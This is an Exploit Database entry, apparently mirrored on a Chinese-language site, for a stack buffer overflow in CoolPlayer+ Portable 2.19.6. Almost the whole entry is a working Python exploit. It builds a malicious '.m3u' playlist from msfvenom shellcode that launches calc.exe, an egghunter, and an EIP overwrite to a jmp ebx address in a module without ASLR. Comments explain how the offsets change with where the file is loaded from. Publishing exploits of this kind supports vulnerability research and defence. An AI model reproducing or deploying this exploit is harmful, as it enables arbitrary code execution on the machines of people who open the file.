CoolPlayer+ Portable 2.19.6 – ‘.m3u’ File Stack Overflow (Egghunter + ASLR Bypass)

• Exploit Database
• 14 阅读

• 作者： Karn Ganeshen
  日期： 2016-07-25
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/40151/

• # Exploit Title: [CoolPlayer+ Portable build 2.19.6 - .m3u Stack Overflow [Egghunter+ASLR bypass]] 
  # Exploit Author: [Karn Ganeshen] 
  # Download link: [https://sourceforge.net/projects/portableapps/files/CoolPlayer%2B%20Portable/CoolPlayerPlusPortable_2.19.6.paf.exe/download?use_mirror=liquidtelecom]
  # Version: [Current version 2.19.6] 
  # Tested on: [Windows Vista Ultimate SP2] 
  # 
  # Couple of bof exploits for older versions already on EDB:
  # https://www.exploit-db.com/search/?action=search&description=coolplayer
  
  #!/usr/bin/python
  
  total_buf = 2000
  
  filename="evil.m3u"
  
  # msfvenom -p windows/exec cmd=calc.exe -b \x00\x0a\x0c\0d EXITFUN=thread -f c
  # Payload size: 220 bytes
  
  shellcode = ("\xdb\xdc\xd9\x74\x24\xf4\x58\xbb\x9a\xc7\xdb\xe9\x31\xc9\xb1"
  "\x31\x31\x58\x18\x83\xe8\xfc\x03\x58\x8e\x25\x2e\x15\x46\x2b"
  "\xd1\xe6\x96\x4c\x5b\x03\xa7\x4c\x3f\x47\x97\x7c\x4b\x05\x1b"
  "\xf6\x19\xbe\xa8\x7a\xb6\xb1\x19\x30\xe0\xfc\x9a\x69\xd0\x9f"
  "\x18\x70\x05\x40\x21\xbb\x58\x81\x66\xa6\x91\xd3\x3f\xac\x04"
  "\xc4\x34\xf8\x94\x6f\x06\xec\x9c\x8c\xde\x0f\x8c\x02\x55\x56"
  "\x0e\xa4\xba\xe2\x07\xbe\xdf\xcf\xde\x35\x2b\xbb\xe0\x9f\x62"
  "\x44\x4e\xde\x4b\xb7\x8e\x26\x6b\x28\xe5\x5e\x88\xd5\xfe\xa4"
  "\xf3\x01\x8a\x3e\x53\xc1\x2c\x9b\x62\x06\xaa\x68\x68\xe3\xb8"
  "\x37\x6c\xf2\x6d\x4c\x88\x7f\x90\x83\x19\x3b\xb7\x07\x42\x9f"
  "\xd6\x1e\x2e\x4e\xe6\x41\x91\x2f\x42\x09\x3f\x3b\xff\x50\x55"
  "\xba\x8d\xee\x1b\xbc\x8d\xf0\x0b\xd5\xbc\x7b\xc4\xa2\x40\xae"
  "\xa1\x5d\x0b\xf3\x83\xf5\xd2\x61\x96\x9b\xe4\x5f\xd4\xa5\x66"
  "\x6a\xa4\x51\x76\x1f\xa1\x1e\x30\xf3\xdb\x0f\xd5\xf3\x48\x2f"
  "\xfc\x97\x0f\xa3\x9c\x79\xaa\x43\x06\x86")
  
  # Egghunter - 32 bytes
  eggh = ("\x66\x81\xca\xff\x0f\x42\x52\x6a"
  "\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 
  "\xef\xb8\x54\x30\x30\x57\x8b\xfa" 
  "\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
  
  # EIP overwrite appears to depend upon location from where the evil file is loaded from
  # Tested from location - C:\
  # For e.g. offset will be different if file is loaded from C: (260) vs C:\Windows\ (249)
  
  junk = "A"*28
  eip = "\xa1\x99\x42\x00" # 0x004299a1 jmp ebx - coolplayer+.exe [noaslr,norebase,nosafeseh]
  
  evil = junk + eggh + "\x90"*200 + eip + "\x90"*18 + "T00WT00W" + shellcode + "\x90"*1490
  
  file = open(filename , 'w')
  file.write(evil)
  file.close()